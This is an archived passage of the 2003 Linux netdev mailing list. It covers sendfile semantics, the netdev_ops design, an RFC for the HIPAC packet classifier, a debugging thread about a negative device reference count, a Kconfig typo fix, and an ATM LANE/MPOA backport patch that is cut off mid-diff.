IP Offloading Interface References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> <1058113895.554.7.camel@dhcp22.swansea.linux.org.uk> In-Reply-To: <1058113895.554.7.camel@dhcp22.swansea.linux.org.uk> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4009 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev Alan Cox wrote: > Finally if you are streaming objects by non mapped references (eg > sendfile or see LM's paper from long ago on splice()) then the problem > goes away. As an aside, I really like sendfile's semantics except for * People occasionally want to add a receivefile(2). I disagree... sendfile(2) interface should be really be considered a universal "fdcopy" interface, regardless of what the 'to' and 'from' file descriptors are attached to. File to socket. Socket to file. File to file. socket to socket. All should be supported, even if the fallback is a stupid (but small!) in-kernel copy loop. * Copy-until-EOF semantics are either undefined, or, unclear to me personally. Jeff From acme@conectiva.com.br Sun Jul 13 22:52:55 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 22:53:01 -0700 (PDT) Received: from orion.netbank.com.br (orion.netbank.com.br [200.203.199.90]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6E5qrFl024722 for ; Sun, 13 Jul 2003 22:52:54 -0700 Received: from [200.193.244.212] (helo=brinquendo.conectiva.com.br) by orion.netbank.com.br with asmtp (Exim 3.33 #1) id 19bwJn-0001xY-00; Mon, 14 Jul 2003 02:56:13 -0300 Received: by brinquendo.conectiva.com.br (Postfix, from userid 500) id 9B9251966D; Mon, 14 Jul 2003 05:53:55 +0000 (UTC) Date: Mon, 14 Jul 2003 02:53:54 -0300 From: Arnaldo Carvalho de Melo To: Matthew Wilcox Cc: Jeff Garzik , netdev@oss.sgi.com, greearb@candelatech.com, "David S. Miller" Subject: Re: [PATCH] netdev_ops Message-ID: <20030714055354.GP3825@conectiva.com.br> References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> <3F0B2D30.4020102@candelatech.com> <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> <20030708.150835.78728697.davem@redhat.com> <20030709161520.GW1939@parcelfarce.linux.theplanet.co.uk> <20030711193215.GH16037@gtf.org> <20030711200423.GL20424@parcelfarce.linux.theplanet.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030711200423.GL20424@parcelfarce.linux.theplanet.co.uk> X-Url: http://advogato.org/person/acme Organization: Conectiva S.A. User-Agent: Mutt/1.5.4i X-archive-position: 4010 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: acme@conectiva.com.br Precedence: bulk X-list: netdev Em Fri, Jul 11, 2003 at 09:04:23PM +0100, Matthew Wilcox escreveu: > On Fri, Jul 11, 2003 at 03:32:15PM -0400, Jeff Garzik wrote: > > 1) The _ops are either too limited in scope, or too wide in scope. > > Couldn't agree more. I blame acme -- he wants me to push it to be much > wider in scope. Let's push _all_ the function pointers into netdev_ops. Hey, it was just a brainstorm session ;) Anyway, I'm heavily backlogged as I'm on a business trip for several days already, I'll try to read all this thread when I'm back home 8) - Arnaldo From nf@hipac.org Mon Jul 14 01:44:56 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 01:45:02 -0700 (PDT) Received: from indyio.rz.uni-saarland.de (indyio.rz.uni-saarland.de [134.96.7.3]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6E8isFl026852 for ; Mon, 14 Jul 2003 01:44:55 -0700 Received: from mars.rz.uni-saarland.de (mars.rz.uni-saarland.de [134.96.7.4]) by indyio.rz.uni-saarland.de (8.12.9/8.12.5) with ESMTP id h6E8ikqk2143996; Mon, 14 Jul 2003 10:44:46 +0200 (CEST) Received: from e002.stw.stud.uni-saarland.de (e002.stw.stud.uni-saarland.de [134.96.65.17]) by mars.rz.uni-saarland.de (8.9.3p2/8.8.4/8.8.2) with ESMTP id KAA8770343; Mon, 14 Jul 2003 10:44:45 +0200 (CEST) Received: from e002.stw.stud.uni-saarland.de ([134.96.65.138] helo=e123.stw.stud.uni-saarland.de) by e002.stw.stud.uni-saarland.de with esmtp (Exim 3.35 #1 (Debian)) id 19bywv-0006P0-00; Mon, 14 Jul 2003 10:44:45 +0200 From: Michael Bellion and Thomas Heinz Reply-To: nf@hipac.org To: linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: [RFC] High Performance Packet Classifiction for tc framework Date: Mon, 14 Jul 2003 10:45:40 +0200 User-Agent: KMail/1.5.2 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Content-Disposition: inline Message-Id: <200307141045.40999.nf@hipac.org> X-archive-position: 4011 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: nf@hipac.org Precedence: bulk X-list: netdev Hi We are planning to port our HIPAC algorithm to the tc framework and we ask you for some comments about several issues. HIPAC is a novel packet classification framework which replaces the common linear approach with a more advanced data structure which offers highly efficient and locking friendly packet matching. Currently, people using lots of filters suffer from a big performance penalty. In contrast, HIPAC is able to handle thousands of filters without much slowdown compared to having no filters at all. There already exists one application of the HIPAC algorithm for the netfilter framework: nf-hipac. Details about the project can be found at our website http://www.hipac.org or our sourceforge project page at http://www.sourceforge.net/projects/nf-hipac Several performance tests of nf-hipac have been done so far (see our website) and have proven our claims. So it would be great if tc users could benefit from HIPAC too. Certainly, we'd like to know first whether HIPAC makes sense for the tc framework at all. From the nf-hipac worst case performance tests we know that our algorithm should be faster in all cases as soon as you have approx. 20 filters. Below 20 filters there is no difference between nf-hipac and the iptables filter table. So basically the question is: Are people using the tc framework with lots of filters? Some numbers would be helpful. Since we can only improve performance of u32 and fw filters it's also interesting whether such rulesets typically consist of those filters in the main. The tc framework is very flexible with respect to where filters can be attached. Unfortunately this cannot be mapped into one HIPAC data structure. Our current design allows to attach filters anywhere but only the filters attached to the top level qdisc would benefit from the HIPAC algorithm. Would this be a noticeable restriction? Here is a short overview of the main design goals: - new qdisc for HIPAC which is basically a container for the filters; it can only be attached as top level qdisc - new HIPAC classifier which supports all native nf-hipac matches (src/dst ip, proto, src/dst port, ttl, state, in_iface, icmp type, tcpflags, fragments) and additionally fwmark - the HIPAC classifier can only be attached to the HIPAC qdisc and vice versa the HIPAC qdisc only accepts HIPAC classifiers - the HIPAC qdisc consists of only one single class to which the "next" qdisc must be attached - the HIPAC classifier can contain a number of existing classifiers (u32, fw, route, rsvp, tcindex) whereby the semantics is as follows: a HIPAC classifier matches if the native matches and also each of the embedded classifiers match; the returned tcf_result is the one from the final classifier (=> intermediate classifiers are reduced to a match) - it is still possible to attach non-hipac classifiers to other qdiscs and classes Regards, +-----------------------+----------------------+ | Michael Bellion | Thomas Heinz | | | | +-----------------------+----------------------+ From rol@as2917.net Mon Jul 14 02:16:17 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 02:16:25 -0700 (PDT) Received: from tag.witbe.net (IDENT:root@tag.witbe.net [81.88.96.48]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6E9GFFl027874 for ; Mon, 14 Jul 2003 02:16:17 -0700 Received: from fifi (APuteaux-102-1-4-243.w193-253.abo.wanadoo.fr [193.253.233.243]) by tag.witbe.net (8.11.0/8.11.0) with ESMTP id h6E9G4p22542; Mon, 14 Jul 2003 09:16:04 GMT From: "Paul Rolland" To: "'Stephen Hemminger'" , , Cc: , Subject: Re: [BUG]: problem when shutting down ppp connection since 2.5.70 Date: Mon, 14 Jul 2003 11:16:04 +0200 Message-ID: <017701c349e8$8dfeeb40$2101a8c0@witbe> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.4510 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 In-Reply-To: <20030709114334.5b8cf7c6.shemminger@osdl.org> Importance: Normal X-archive-position: 4012 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: rol@as2917.net Precedence: bulk X-list: netdev Hello, I've applied the patch from Stephen on top of the 2.6.0-test1 kernel, and here is the result : Jul 14 10:57:01 donald kernel: dst route cache has 0 references Jul 14 10:57:01 donald kernel: unregister_netdevice: waiting for tap0 to become free. Usage count = -3 Jul 14 10:57:10 donald kernel: dst route cache has 0 references Jul 14 10:57:10 donald kernel: unregister_netdevice: waiting for tap0 to become free. Usage count = -3 Jul 14 10:57:20 donald kernel: dst route cache has 0 references Jul 14 10:57:20 donald kernel: unregister_netdevice: waiting for tap0 to become free. Usage count = -3 Jul 14 10:57:31 donald kernel: dst route cache has 0 references Jul 14 10:57:31 donald kernel: unregister_netdevice: waiting for tap0 to become free. Usage count = -3 This is a big change compared to 2.5.74 (.75 not tested). I guess a negative usage count should be considered as valid by unregister_netdevice. What about : --- dev.c 2003-07-14 11:13:23.000000000 +0200 +++ dev.c.orig 2003-07-14 11:13:01.000000000 +0200 @@ -2746,7 +2746,7 @@ unsigned long rebroadcast_time, warning_time; rebroadcast_time = warning_time = jiffies; - while (atomic_read(&dev->refcnt) > 0) { + while (atomic_read(&dev->refcnt) != 0) { if (time_after(jiffies, rebroadcast_time + 1 * HZ)) { rtnl_shlock(); rtnl_exlock(); Regards, Paul ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ REHAB is for quitters. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Paul Rolland, rol@witbe.net Witbe.net SA Directeur Associe -- Please no HTML, I'm not a browser - Pas d'HTML, je ne suis pas un navigateur "Some people dream of success... while others wake up and work hard at it" > -----Original Message----- > From: Stephen Hemminger [mailto:shemminger@osdl.org] > Sent: Wednesday, July 09, 2003 8:44 PM > To: Paul Rolland; cfriesen@nortelnetworks.com; paulus@samba.org > Cc: linux-ppp@vger.kernel.org; netdev@oss.sgi.com > Subject: Re: [BUG]: problem when shutting down ppp connection > since 2.5.70 > > > The problem is that some protocol is still holding a reference to the > device. This is a bug in the protocol, and needs to be fixed (ie not a > ppp bug). > > Try building a kernel with only IPv4, eliminate all others then add > back until you find the culprit. > > The following patch may help also. > > diff -Nru a/net/core/dev.c b/net/core/dev.c > --- a/net/core/dev.c Wed Jul 9 11:40:56 2003 > +++ b/net/core/dev.c Wed Jul 9 11:40:56 2003 > @@ -72,6 +72,8 @@ > * - netif_rx() feedback > */ > > +#define DEBUG 1 > + > #include > #include > #include > @@ -2704,6 +2706,8 @@ > goto out; > } > > +extern void dst_dumpref(const struct net_device *dev); > + > static void netdev_wait_allrefs(struct net_device *dev) > { > unsigned long rebroadcast_time, warning_time; > @@ -2740,6 +2744,30 @@ > current->state = TASK_RUNNING; > > if (time_after(jiffies, warning_time + 10 * HZ)) { > +#ifdef DEBUG > + dst_dumpref(dev); > + > + if (dev->atalk_ptr) > + printk(KERN_INFO > "unregister_netdevice: " > + " %s: probably in use as > AppleTalk device\n", dev->name); > + if (dev->ip_ptr) > + printk(KERN_INFO > "unregister_netdevice: " > + " %s: probably in use as > IPv4 device\n", dev->name); > + > + if (dev->atalk_ptr) > + printk(KERN_INFO > "unregister_netdevice: " > + " %s: probably in use as > DECnet device\n", dev->name); > + if (dev->ip6_ptr) > + printk(KERN_INFO > "unregister_netdevice: " > + " %s: probably in use as > IPv6 device\n", dev->name); > + > + if (dev->ec_ptr) > + printk(KERN_INFO > "unregister_netdevice: " > + " %s: probably in use as > Econet device\n", dev->name); > + if (dev->ax25_ptr) > + printk(KERN_INFO > "unregister_netdevice: " > + " %s: probably in use as > AX.25 device\n", dev->name); #endif > printk(KERN_EMERG "unregister_netdevice: " > "waiting for %s to become free. Usage " > "count = %d\n", > diff -Nru a/net/core/dst.c b/net/core/dst.c > --- a/net/core/dst.c Wed Jul 9 11:40:56 2003 > +++ b/net/core/dst.c Wed Jul 9 11:40:56 2003 > @@ -41,6 +41,21 @@ > static struct timer_list dst_gc_timer = > TIMER_INITIALIZER(dst_run_gc, 0, DST_GC_MIN); > > + > +void dst_dumpref(const struct net_device *dev) > +{ > + struct dst_entry *dst; > + int count = 0; > + > + spin_lock_bh(&dst_lock); > + for (dst = dst_garbage_list; dst; dst = dst->next) { > + if (dst->dev == dev) ++count; > + } > + spin_unlock_bh(&dst_lock); > + > + printk(KERN_INFO "dst route cache has %d references\n", > count); } > + > static void dst_run_gc(unsigned long dummy) > { > int delayed = 0; > From rol@as2917.net Mon Jul 14 04:44:02 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 04:44:11 -0700 (PDT) Received: from tag.witbe.net (IDENT:root@tag.witbe.net [81.88.96.48]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6EBi1Fl010775 for ; Mon, 14 Jul 2003 04:44:02 -0700 Received: from fifi (APuteaux-102-1-4-243.w193-253.abo.wanadoo.fr [193.253.233.243]) by tag.witbe.net (8.11.0/8.11.0) with ESMTP id h6EBhqp13963; Mon, 14 Jul 2003 11:43:52 GMT From: "Paul Rolland" To: "'Paul Rolland'" , "'Stephen Hemminger'" , , Cc: , Subject: Re: [BUG]: problem when shutting down ppp connection since 2.5.70 Date: Mon, 14 Jul 2003 13:43:51 +0200 Message-ID: <018201c349fd$330a6a60$2101a8c0@witbe> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.4510 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 In-Reply-To: Importance: Normal X-archive-position: 4013 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: rol@as2917.net Precedence: bulk X-list: netdev Hello, I'm sorry, the patch was not complete, it should have considered the BUG_ON too... Here is one that is fine on my system : --- dev.c.orig 2003-07-14 13:41:33.000000000 +0200 +++ dev.c 2003-07-14 13:34:27.000000000 +0200 @@ -2742,7 +2742,7 @@ unsigned long rebroadcast_time, warning_time; rebroadcast_time = warning_time = jiffies; - while (atomic_read(&dev->refcnt) != 0) { + while (atomic_read(&dev->refcnt) > 0) { if (time_after(jiffies, rebroadcast_time + 1 * HZ)) { rtnl_shlock(); rtnl_exlock(); @@ -2836,7 +2836,7 @@ dev->reg_state = NETREG_UNREGISTERED; netdev_wait_allrefs(dev); - BUG_ON(atomic_read(&dev->refcnt)); + BUG_ON(atomic_read(&dev->refcnt) > 0); netdev_finish_unregister(dev); break; Still don't understand why refcnt is really bad (negative value), but at least the machine is working... Paul ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I have a vitally important role serving as a bad example. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From albertogli@telpin.com.ar Mon Jul 14 07:03:10 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 07:03:18 -0700 (PDT) Received: from mail.telpin.com.ar (mail.telpin.com.ar [200.43.18.243]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6EE38Fl021526 for ; Mon, 14 Jul 2003 07:03:09 -0700 Received: from telpin.com.ar (host213.200-43-231.telecom.net.ar [200.43.231.213]) by mail.telpin.com.ar (8.12.9/8.12.1) with SMTP id h6EE3snt016542; Mon, 14 Jul 2003 11:03:55 -0300 Date: Mon, 14 Jul 2003 11:03:50 -0300 From: Alberto Bertogli To: netdev@oss.sgi.com Cc: linux-net@vger.kernel.org, linux-kernel@vger.kernel.org Subject: [PATCH] IPVS' Kconfig LBLC and LBLCR configuration typo Message-ID: <20030714140350.GB1389@telpin.com.ar> Mail-Followup-To: Alberto Bertogli , netdev@oss.sgi.com, linux-net@vger.kernel.org, linux-kernel@vger.kernel.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.5.4i X-RAVMilter-Version: 8.4.2(snapshot 20021217) (mail) X-archive-position: 4014 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: albertogli@telpin.com.ar Precedence: bulk X-list: netdev Hi there! The following patch fixes what looks like a typo in ipvs' Kconfig (net/ipv4/ipvs/Kconfig). Both the IP_VS_LBLC and IP_VS_LBLCR schedulings have the same tristate line (well, not the same, IP_VS_LBLCR's has a 'g' missing at the end): tristate "locality-based least-connection with replication scheduling" But it looks like LBLC should be "locality-based least-connection scheduling" and LBLCR "locality-based least-connection with replication scheduling". Thanks, Alberto --- Kconfig.orig 2003-07-14 10:32:06.000000000 -0300 +++ Kconfig 2003-07-14 10:32:57.000000000 -0300 @@ -147,7 +147,7 @@ unsure, say N. config IP_VS_LBLC - tristate "locality-based least-connection with replication scheduling" + tristate "locality-based least-connection scheduling" depends on IP_VS ---help--- The locality-based least-connection scheduling algorithm is for @@ -163,7 +163,7 @@ unsure, say N. config IP_VS_LBLCR - tristate "locality-based least-connection with replication schedulin" + tristate "locality-based least-connection with replication scheduling" depends on IP_VS ---help--- The locality-based least-connection with replication scheduling From jgarzik@pobox.com Mon Jul 14 07:09:49 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 07:09:53 -0700 (PDT) Received: from www.linux.org.uk (IDENT:M/qbtNfsDWHJio/1VYO4Aw0UMjqCI23V@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6EE9lFl022342 for ; Mon, 14 Jul 2003 07:09:48 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19b4xb-0006rs-6O; Fri, 11 Jul 2003 21:57:43 +0100 Message-ID: <3F0F24B1.5050200@pobox.com> Date: Fri, 11 Jul 2003 16:57:21 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Matthew Wilcox CC: netdev@oss.sgi.com Subject: Re: [PATCH] Move eth_mac_addr and eth_change_mtu References: <20030711181946.GG20424@parcelfarce.linux.theplanet.co.uk> <20030711182330.GC16037@gtf.org> <20030711182530.GH20424@parcelfarce.linux.theplanet.co.uk> In-Reply-To: <20030711182530.GH20424@parcelfarce.linux.theplanet.co.uk> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4015 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev Matthew Wilcox wrote: > On Fri, Jul 11, 2003 at 02:23:30PM -0400, Jeff Garzik wrote: > >>On Fri, Jul 11, 2003 at 07:19:46PM +0100, Matthew Wilcox wrote: >> >>>Move eth_mac_addr() and eth_change_mtu() from drivers/net/net_init.c >>>to net/ethernet/eth.c >> >>Why? It's not used outside of net_init.c AFAICS. > > > Preparation for the next stage of netdev_ops Well, I don't see/understand this next-stage, so elaboration would be nice. As-is, I do not support merging this patch. Jeff From chas@locutus.cmf.nrl.navy.mil Mon Jul 14 11:01:33 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 11:01:50 -0700 (PDT) Received: from ginger.cmf.nrl.navy.mil (ginger.cmf.nrl.navy.mil [134.207.10.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6EI1WFl027535 for ; Mon, 14 Jul 2003 11:01:32 -0700 Received: from locutus.cmf.nrl.navy.mil (locutus.cmf.nrl.navy.mil [134.207.10.66]) by ginger.cmf.nrl.navy.mil (8.12.7/8.12.7) with ESMTP id h6EGWgsG016111; Mon, 14 Jul 2003 12:32:42 -0400 (EDT) Received: (from chas@localhost) by locutus.cmf.nrl.navy.mil (8.12.7/8.12.7/Submit) id h6EGUDmZ007717; Mon, 14 Jul 2003 12:30:14 -0400 Date: Mon, 14 Jul 2003 12:30:14 -0400 From: chas williams Message-Id: <200307141630.h6EGUDmZ007717@locutus.cmf.nrl.navy.mil> To: davem@redhat.com Subject: [PATCH][2.4] more atm backports for 2.4 Cc: netdev@oss.sgi.com X-Spam-Score: () hits=0.4 X-Virus-Scanned: NAI Completed X-Scanned-By: MIMEDefang 2.30 (www . roaringpenguin . com / mimedefang) X-archive-position: 4019 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: chas@cmf.nrl.navy.mil Precedence: bulk X-list: netdev [atm]: cleanup lane and mpoa module interface # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1015 -> 1.1016 # net/atm/lec.c 1.16 -> 1.17 # net/atm/mpc.h 1.1 -> 1.2 # net/atm/mpc.c 1.8 -> 1.9 # net/atm/proc.c 1.8 -> 1.9 # net/atm/lec.h 1.4 -> 1.5 # net/atm/common.c 1.17 -> 1.18 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/06/27 chas@relax.cmf.nrl.navy.mil 1.1016 # cleanup lane and mpoa module interface # -------------------------------------------- # diff -Nru a/net/atm/common.c b/net/atm/common.c --- a/net/atm/common.c Mon Jun 30 13:21:44 2003 +++ b/net/atm/common.c Mon Jun 30 13:21:44 2003 @@ -33,21 +33,61 @@ #include #include "lec.h" #include "lec_arpc.h" -struct atm_lane_ops atm_lane_ops; -#endif -#ifdef CONFIG_ATM_LANE_MODULE +struct atm_lane_ops *atm_lane_ops; +static DECLARE_MUTEX(atm_lane_ops_mutex); + +void atm_lane_ops_set(struct atm_lane_ops *hook) +{ + down(&atm_lane_ops_mutex); + atm_lane_ops = hook; + up(&atm_lane_ops_mutex); +} + +int try_atm_lane_ops(void) +{ + down(&atm_lane_ops_mutex); + if (atm_lane_ops && try_inc_mod_count(atm_lane_ops->owner)) { + up(&atm_lane_ops_mutex); + return 1; + } + up(&atm_lane_ops_mutex); + return 0; +} + +#if defined(CONFIG_ATM_LANE_MODULE) || defined(CONFIG_ATM_MPOA_MODULE) EXPORT_SYMBOL(atm_lane_ops); +EXPORT_SYMBOL(try_atm_lane_ops); +EXPORT_SYMBOL(atm_lane_ops_set); +#endif #endif #if defined(CONFIG_ATM_MPOA) || defined(CONFIG_ATM_MPOA_MODULE) #include #include "mpc.h" -struct atm_mpoa_ops atm_mpoa_ops; -#endif +struct atm_mpoa_ops *atm_mpoa_ops; +static DECLARE_MUTEX(atm_mpoa_ops_mutex); + +void atm_mpoa_ops_set(struct atm_mpoa_ops *hook) +{ + down(&atm_mpoa_ops_mutex); + atm_mpoa_ops = hook; + up(&atm_mpoa_ops_mutex); +} + +int try_atm_mpoa_ops(void) +{ + down(&atm_mpoa_ops_mutex); + if (atm_mpoa_ops && try_inc_mod_count(atm_mpoa_ops->owner)) { + up(&atm_mpoa_ops_mutex); + return 1; + } + up(&atm_mpoa_ops_mutex); + return 0; +} #ifdef CONFIG_ATM_MPOA_MODULE EXPORT_SYMBOL(atm_mpoa_ops); -#ifndef CONFIG_ATM_LANE_MODULE -EXPORT_SYMBOL(atm_lane_ops); +EXPORT_SYMBOL(try_atm_mpoa_ops); +EXPORT_SYMBOL(atm_mpoa_ops_set); #endif #endif @@ -734,27 +774,40 @@ ret_val = -EPERM; goto done; } - if (atm_lane_ops.lecd_attach == NULL) - atm_lane_init(); - if (atm_lane_ops.lecd_attach == NULL) { /* try again */ +#if defined(CONFIG_ATM_LANE_MODULE) + if (!atm_lane_ops) + request_module("lec"); +#endif + if (try_atm_lane_ops()) { + error = atm_lane_ops->lecd_attach(vcc, (int) arg); + __MOD_DEC_USE_COUNT(atm_lane_ops->owner); + if (error >= 0) + sock->state = SS_CONNECTED; + ret_val = error; + } else ret_val = -ENOSYS; - goto done; - } - error = atm_lane_ops.lecd_attach(vcc, (int)arg); - if (error >= 0) sock->state = SS_CONNECTED; - ret_val = error; goto done; case ATMLEC_MCAST: - if (!capable(CAP_NET_ADMIN)) + if (!capable(CAP_NET_ADMIN)) { ret_val = -EPERM; - else - ret_val = atm_lane_ops.mcast_attach(vcc, (int)arg); + goto done; + } + if (try_atm_lane_ops()) { + ret_val = atm_lane_ops->mcast_attach(vcc, (int) arg); + __MOD_DEC_USE_COUNT(atm_lane_ops->owner); + } else + ret_val = -ENOSYS; goto done; case ATMLEC_DATA: - if (!capable(CAP_NET_ADMIN)) + if (!capable(CAP_NET_ADMIN)) { ret_val = -EPERM; - else - ret_val = atm_lane_ops.vcc_attach(vcc, (void*)arg); + goto done; + } + if (try_atm_lane_ops()) { + ret_val = atm_lane_ops->vcc_attach(vcc, (void *) arg); + __MOD_DEC_USE_COUNT(atm_lane_ops->owner); + } else + ret_val = -ENOSYS; goto done; #endif #if defined(CONFIG_ATM_MPOA) || defined(CONFIG_ATM_MPOA_MODULE) @@ -763,21 +816,29 @@ ret_val = -EPERM; goto done; } - if (atm_mpoa_ops.mpoad_attach == NULL) - atm_mpoa_init(); - if (atm_mpoa_ops.mpoad_attach == NULL) { /* try again */ +#if defined(CONFIG_ATM_MPOA_MODULE) + if (!atm_mpoa_ops) + request_module("mpoa"); +#endif + if (try_atm_mpoa_ops()) { + error = atm_mpoa_ops->mpoad_attach(vcc, (int) arg); + __MOD_DEC_USE_COUNT(atm_mpoa_ops->owner); + if (error >= 0) + sock->state = SS_CONNECTED; + ret_val = error; + } else ret_val = -ENOSYS; - goto done; - } - error = atm_mpoa_ops.mpoad_attach(vcc, (int)arg); - if (error >= 0) sock->state = SS_CONNECTED; - ret_val = error; goto done; case ATMMPC_DATA: - if (!capable(CAP_NET_ADMIN)) + if (!capable(CAP_NET_ADMIN)) { ret_val = -EPERM; - else - ret_val = atm_mpoa_ops.vcc_attach(vcc, arg); + goto done; + } + if (try_atm_mpoa_ops()) { + ret_val = atm_mpoa_ops->vcc_attach(vcc, arg); + __MOD_DEC_USE_COUNT(atm_mpoa_ops->owner); + } else + ret_val = -ENOSYS; goto done; #endif #if defined(CONFIG_ATM_TCP) || defined(CONFIG_ATM_TCP_MODULE) @@ -1162,40 +1223,6 @@ } -/* - * lane_mpoa_init.c: A couple of helper functions - * to make modular LANE and MPOA client easier to implement - */ - -/* - * This is how it goes: - * - * if xxxx is not compiled as module, call atm_xxxx_init_ops() - * from here - * else call atm_mpoa_init_ops() from init_module() within - * the kernel when xxxx module is loaded - * - * In either case function pointers in struct atm_xxxx_ops - * are initialized to their correct values. Either they - * point to functions in the module or in the kernel - */ - -extern struct atm_mpoa_ops atm_mpoa_ops; /* in common.c */ -extern struct atm_lane_ops atm_lane_ops; /* in common.c */ - -#if defined(CONFIG_ATM_MPOA) || defined(CONFIG_ATM_MPOA_MODULE) -void atm_mpoa_init(void) -{ -#ifndef CONFIG_ATM_MPOA_MODULE /* not module */ - atm_mpoa_init_ops(&atm_mpoa_ops); -#else - request_module("mpoa"); -#endif - - return; -} -#endif - #if defined(CONFIG_ATM_LANE) || defined(CONFIG_ATM_LANE_MODULE) #if defined(CONFIG_BRIDGE) || defined(CONFIG_BRIDGE_MODULE) struct net_bridge_fdb_entry *(*br_fdb_get_hook)(struct net_bridge *br, @@ -1206,18 +1233,8 @@ EXPORT_SYMBOL(br_fdb_put_hook); #endif /* defined(CONFIG_ATM_LANE_MODULE) || defined(CONFIG_BRIDGE_MODULE) */ #endif /* defined(CONFIG_BRIDGE) || defined(CONFIG_BRIDGE_MODULE) */ +#endif /* defined(CONFIG_ATM_LANE) || defined(CONFIG_ATM_LANE_MODULE) */ -void atm_lane_init(void) -{ -#ifndef CONFIG_ATM_LANE_MODULE /* not module */ - atm_lane_init_ops(&atm_lane_ops); -#else - request_module("lec"); -#endif - - return; -} -#endif static int __init atm_init(void) { diff -Nru a/net/atm/lec.c b/net/atm/lec.c --- a/net/atm/lec.c Mon Jun 30 13:21:44 2003 +++ b/net/atm/lec.c Mon Jun 30 13:21:44 2003 @@ -11,6 +11,7 @@ /* We are ethernet device */ #include #include +#include #include #include #include @@ -56,8 +57,6 @@ unsigned char *addr); extern void (*br_fdb_put_hook)(struct net_bridge_fdb_entry *ent); -static spinlock_t lec_arp_spinlock = SPIN_LOCK_UNLOCKED; - #define DUMP_PACKETS 0 /* 0 = None, * 1 = 30 first bytes * 2 = Whole packet @@ -71,9 +70,9 @@ static int lec_close(struct net_device *dev); static struct net_device_stats *lec_get_stats(struct net_device *dev); static void lec_init(struct net_device *dev); -static __inline__ struct lec_arp_table* lec_arp_find(struct lec_priv *priv, +static inline struct lec_arp_table* lec_arp_find(struct lec_priv *priv, unsigned char *mac_addr); -static __inline__ int lec_arp_remove(struct lec_arp_table **lec_arp_tables, +static inline int lec_arp_remove(struct lec_priv *priv, struct lec_arp_table *to_remove); /* LANE2 functions */ static void lane2_associate_ind (struct net_device *dev, u8 *mac_address, @@ -95,8 +94,18 @@ static struct net_device *dev_lec[MAX_LEC_ITF]; /* This will be called from proc.c via function pointer */ -struct net_device **get_dev_lec (void) { - return &dev_lec[0]; +struct net_device 